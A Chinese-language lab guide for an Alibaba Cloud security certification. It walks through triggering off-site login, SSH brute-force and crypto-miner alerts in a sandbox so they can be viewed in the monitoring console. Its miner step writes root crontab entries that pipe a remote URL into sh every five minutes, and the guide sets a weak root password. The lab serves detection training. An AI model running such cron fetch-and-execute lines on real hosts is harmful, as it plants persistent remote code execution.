阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全中心 防病毒版,最高20核 3个月
云安全态势管理CSPM免费试用,1000次1年
简介: 阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

1、实验概述

通过本实验可对云安全中心,态势感知的一些基本操作有深入了解以及如何来对实例进行安全监控

2、实验目标

完成此实验可以掌握的能力有:

在安骑士中添加白名单、登录安全设置

通过态势感知查看实例的相关告警威胁

3、学前建议:

了解安骑士、态势感知控制台


第 1 章:实验背景


1.1 背景知识


安骑士是阿里云云盾推出的一款轻量级主机服务,支持阿里云和非阿里云服务器。通过采集用户主机资产和运行状态、脆弱性和安全告警数据,提供主机威胁检测和自动防御的能力。

态势感知是阿里云云盾下的云上安全监控和诊断服务,面向云上资产提供安全事件检测、漏洞扫描、基线配置核查等服务。态势感知结合了阿里自主研发的大数据和机器学习算法,通过多引擎查杀帮助实时全面了解和有效处理服务器的安全隐患,并实现对云上资产的集中安全管理 。


第 2 章:实验详述


2.1 实验资源


在弹出的左侧栏中,点击 创建资源 按钮,开始创建实验资源。

资源创建过程需要1-3分钟。完成实验资源的创建后,用户可以通过 实验资源 查看实验中所需的资源信息,例如:阿里云账号等。


2.2 实验步骤


通过沙箱申请资源成功后,在本地保存下阿里云账号信息,包括企业别名、子用户名称、子用户密码、AK ID 和AK Secret。点击前往控制台按钮

20200709132312213.jpg

进入登录页面,输入申请资源处提供的账号,@前为子用户名称,@后为企业别名

20200709132351402.jpg

复制用户密码

20200709132411175.jpg

点击登录

一、创建黑客ECS

1.在与沙箱生成的目标ECS的另一个地域,创建一台黑客ECS

点击云服务器ECS


20200709132438545.jpg


此处可以看到,我们的目标站点在华东二


20200709132458197.jpg

点击下图的创建实例

20200709132518442.jpg

202007091325362.jpg


镜像选择centos 6.8即可

20200709132556490.png

2.网络选择默认vpc即可


20200709132617762.png


3.管理员root 密码设定为1234@abcd,实例名可以为hack


20200709132637794.png

4.点击确认订单


勾选服务条款,并点击创建实例


5.创建成功


二、将本地IP加入白名单以防被拉黑


1.查询本地IP。通过浏览器打开 www.ip138.com 来查询本地IP

20200709132716740.png

2.在产品服务中找到安骑士


20200709132735436.png


3.在安骑士找到设置,安全配置,点击登录ip拦截加白(点此设置)

20200709132754853.png


4.点击添加

20200709132816520.png

5.将刚刚找到的本地ip复制到源IP中,将目标主机添加到其中,点击确定白名单增加完成。(如果没有列出目标服务器的IP,对象类型选择择:弹性公网EIP)


20200709132835308.png三、利用不同地域的黑客ECS远程登录监控目标


1.在安骑士入侵检测,异常登录中,查看异地登录,目前没有记录


20200709132854999.png


2.点击登录安全设置

20200709132913542.png

3.点击添加,选择常用登录地,资产勾选目标ECS,并点击确定

2020070913293466.png


4.利用本地远程登录目标ECS


可通过安骑士资产列表查看目标ecs IP地址

20200709132952440.png


Mac版直接通过终端登录,windows版请参考云中沙箱 帮助文档

20200709133011935.png

5.刷新可以看到没有告警提示

20200709133029710.png


6.重复上述登录步骤,登录hack服务器,并远程连接目标ECS


20200709133046607.png

7.再次刷新,可看到异地登录告警记录

2020070913310335.png


四、利用黑客ECS通过SSH登录监控目标ECS(密码故意打错模拟爆破)


1.本地ssh登录黑客ECS

20200709133121828.png


2.通过黑客ECS ssh 登录目标ECS,故意打错密码(多操作几次,3-6次),态势感知会判断为暴破。


20200709133140249.png


五、通过态势感知进行查看威胁

1.在产品服务->安全->态势感知 打开态势感知控制台


20200709133158125.png



2.可以看到有一个安全告警,是之前异地登录的告警


20200709133217303.png

3.点击攻击分析,可查看攻击分析的异常。(模拟暴力破解的异常6个小时内才会同步到攻击分析)

20200709133235780.png


4.点击安全大屏,也可查看安全威胁。

2020070913325433.png


六、模拟矿机异常行为

在目标主机输入命令,模拟矿机行为

echo "/5 * curl -sL https://1.co/6n11111PMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -sL https://1.co/6n1111P1MR | sh" > /var/spool/cron/crontabs/root
crontab –l

20200709133330441.png

过几分钟,在态势感知的 安全告警处理 中,可查看到 进程异常行为。

20200709133348562.png

目录
相关文章
|
6天前
|
云安全 数据采集 安全
阿里云热门云安全产品简介:Web应用防火墙与云防火墙产品各自作用介绍
在阿里云的安全类云产品中,Web应用防火墙与云防火墙是用户比较关注的两款安全产品,二者在作用上各有侧重,共同构成了阿里云强大的安全防护体系。本文将对Web应用防火墙与云防火墙产品各自的主要作用进行详细介绍。
|
19天前
|
云安全 弹性计算 安全
云产品评测|云安全这道坎,企业该怎么迈?阿里云「安全体检」实测报告
随着云计算的普及,云安全问题日益突出。阿里云提供的免费“安全体检”工具,能够自动化检测系统漏洞、风险配置和病毒攻击,帮助用户及时发现并修复潜在的安全隐患。通过实际测试,该工具在基础漏洞检测方面表现出色,但对于高级攻击(如文件上传攻击)的识别能力有限,且免费版功能相对简单。对于中小企业和个人用户而言,这一工具极具价值,能够显著提升云上资产的安全性。然而,对于安全要求极高的企业,建议结合其他专业安全服务使用,以确保全面防护。 总结:阿里云“安全体检”适合入门级用户快速提升安全性,但并非万能解决方案。
|
12天前
|
云安全 弹性计算 安全
阿里云服务器安全攻略参考:基础防护与云安全产品简介
在使用云服务器的过程中,云服务器的安全问题是很多用户非常关心的问题,阿里云服务器除了提供基础的防护之外,我们也可以选择其他的云安全类产品来确保我们云服务器的安全。本文为您介绍阿里云服务器的基础安全防护机制,以及阿里云提供的各类云安全产品,帮助用户全面了解并选择合适的防护手段,为云上业务保驾护航。
|
24天前
|
云安全 人工智能 安全
用AI来做云安全是怎样一种体验?阿里云安全AI能力大曝光
用AI来做云安全是怎样一种体验?阿里云安全AI能力大曝光
|
20天前
|
云安全 机器学习/深度学习 人工智能
课时12:阿里云安全产品之态势感知
阿里云态势感知是基于人工智能的安全产品,帮助企业应对高隐蔽性网络攻击。它通过机器学习全面感知网络威胁,覆盖网络层、主机层和应用层,提供实时入侵检测与响应。具备威胁模型、专家定制、超强检索及全网威胁情报等六大核心优势,显著增强企业网络安全防御能力。在G20峰会期间,成功实现平台用户网站安全运营零干扰。
|
1月前
|
云安全 存储 监控
云安全:云计算安全
云安全是指在云计算环境中保护数据、应用程序和相关服务不受威胁的一系列策略、技术和控制措施。随着云计算的快速发展,云安全已成为企业和个人用户最关心的问题之一。云安全的目标是确保云环境中数据的机密性、完整性和可用性,同时防止数据丢失、服务中断和不正当访问。
122 81
|
2月前
|
云安全 存储 弹性计算
云安全中心:保护您的多云产品安全
阿里云安全中心提供统一的多云环境安全防护,涵盖病毒查杀、漏洞扫描、防勒索等功能,支持ECS、OSS等云产品配置风险检测。首次使用需关注主机安全授权、配置检查策略及恶意文件检测三大功能,确保系统安全合规,降低管理成本,提升整体安全水平。了解更多可关注阿里云中小企业直播间。
|
2月前
|
监控 安全 Cloud Native
阿里云容器服务&云安全中心团队荣获信通院“云原生安全标杆案例”奖
2024年12月24日,阿里云容器服务团队与云安全中心团队获得中国信息通信研究院「云原生安全标杆案例」奖。
|
4月前
|
云安全 人工智能 自然语言处理
用AI来做云安全是怎样一种体验?阿里云安全AI能力大曝光
阿里云内容安全大模型获CSA安全金盾奖
1269 2
|
4月前
|
云安全 安全 数据安全/隐私保护
带你读《阿里云安全白皮书》(十八)——云上安全重要支柱(12)
随着数智化发展,企业面临复杂的资产管理需求。阿里云提供全链路身份管控与精细化授权方案,涵盖细粒度权限管理和身份凭证保护,确保数据资产安全。支持多因素认证和最小权限原则,减少风险暴露,提升企业安全效率。详情见《阿里云安全白皮书(2024版)》。

热门文章

最新文章